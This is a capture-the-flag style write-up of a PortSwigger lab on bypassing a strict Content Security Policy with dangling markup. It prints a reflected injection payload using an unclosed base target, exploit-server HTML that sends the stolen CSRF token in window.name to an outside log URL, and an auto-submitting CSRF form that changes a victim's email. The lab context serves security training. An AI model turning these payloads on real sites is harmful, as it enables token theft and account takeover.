siunam's Website

My personal website

Home Writeups Research Blog Projects About

Reflected XSS protected by very strict CSP, with dangling markup attack | Jan 2, 2023

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you'll learn: Reflected XSS protected by very strict CSP, with dangling markup attack! Without further ado, let's dive in.

Background

This lab using a strict CSP that blocks outgoing requests to external web sites.

To solve the lab, first perform a cross-site scripting attack that bypasses the CSP and exfiltrates a simulated victim user's CSRF token using Burp Collaborator. You then need to change the simulated user's email address to hacker@evil-user.net.

You must label your vector with the word "Click" in order to induce the simulated user to click it. For example:

<a href="">Click me</a>

You can log in to your own account using the following credentials: wiener:peter

Exploitation

Home page:

Login as user wiener:

In here, we can update our email.

Let's try to update it:

Burp Suite HTTP history:

When we clicked the Update email button, it'll send a POST request to /my-account/change-email with parameter email and csrf.

We also see CSP (Content Security Policy) is enabled:

Content-Security-Policy: default-src 'self';object-src 'none'; style-src 'self'; script-src 'self'; img-src 'self'; base-uri 'none';

However, we can see object-src base-uri is set to none.

Now, we can try to provide a GET parameter email in the URL:

As you can see, our input is reflected to the <input> tag's value.

In here, we can try to inject some JavaScript code via dangling markup injection:

my-account?email="><img src=errorpls onerror=alert(document.domain) x="

However, the CSP blocked the alert() JavaScript function, as the script-src is set to self.

Now, since CSP's base-uri is set to none, we can leverage the <base> tag to exfiltrate the CSRF token.

According to HackTricks, we can do that:

Let's use the exploit server:

Payload:

my-account?email="><a href="https://exploit-0a89002e0459822cc1ae162701c40031.exploit-server.net/exploit">Click me to update email</a><base target='

When we click the link, it'll redirect to our exploit server's exploit payload, with the CSRF token.

Let's go to the exploit server do exfiltration:

<html>
    <head>
        <title>XSS-29</title>
    </head>
    <body>
        <script>
            if(window.name) {
                new Image().src='//exploit-0a89002e0459822cc1ae162701c40031.exploit-server.net/log?'+encodeURIComponent(window.name);
            } else {
                window.location.replace('https://0a81003404868282c10c179800fd00e3.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://exploit-0a89002e0459822cc1ae162701c40031.exploit-server.net/exploit%22%3EClick%20me%20to%20update%20email%3C/a%3E%3Cbase%20target=%27');
            }
        </script>
    </body>
</html>

To test it, we can click "Store" and "View exploit":

When we clicked "View exploit", the exploit HTML code will redirect us to our XSS payload:

Then, if the we click on our payload, it'll send the CSRF token to exploit server's access log:

URL decoded:

">
                            <input required type="hidden" name="csrf" value="JqFRqnLcMIG8Qvt6KFvHjqJYV2uBj48t">
                            <button class=

Now, let's click "Deliver exploit to victim" to capture his/her CSRF token:

Access log:

URL decoded:

">
                            <input required type="hidden" name="csrf" value="iT656UfZGanewC5gcF46iKOlOzZXorx2">
                            <button class=

Nice! Victim's CSRF token: iT656UfZGanewC5gcF46iKOlOzZXorx2

Armed with above information, we can perform CSRF attack, which changes victim's email to our controlled email address.

Final CSRF attack payload:

<html>
    <head>
        <title>XSS-29</title>
    </head>
    <body>
        <!-- Construct a form that performs CSRF attack, which changes victim's email address to hacker@evil-user.net-->
        <form name="csrfform" method="post" action="https://0a81003404868282c10c179800fd00e3.web-security-academy.net/my-account/change-email">
            <input type="hidden" id="csrf" name="csrf" value="" />
            <input type="hidden" name="email" value="hacker@evil-user.net" />
        </form>

        <script>
            // If the window.name object exist, then: (This is included in the <base> element in our XSS payload.)
            if(window.name) {
                // Extract victim's CSRF token in window's object name, at string length 80 - 112
                var CSRFToken = window.name.slice(80,112);

                // Update our CSRF form's CSRF value to the victim ones
                document.getElementById('csrf').value = CSRFToken;

                // Automatically submit the form
                document.forms['csrfform'].submit();
            // If no window.name object, then:
            } else {
                // Redirect to our XSS via dangling markup injection payload
                window.location.replace('https://0a81003404868282c10c179800fd00e3.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://exploit-0a89002e0459822cc1ae162701c40031.exploit-server.net/exploit%22%3EClick%20me%20to%20update%20email%3C/a%3E%3Cbase%20target=%27');
            }
        </script>
    </body>
</html>

Finally, we can deliver the exploit to victim:

We did it!

What we've learned:

  1. Reflected XSS protected by very strict CSP, with dangling markup attack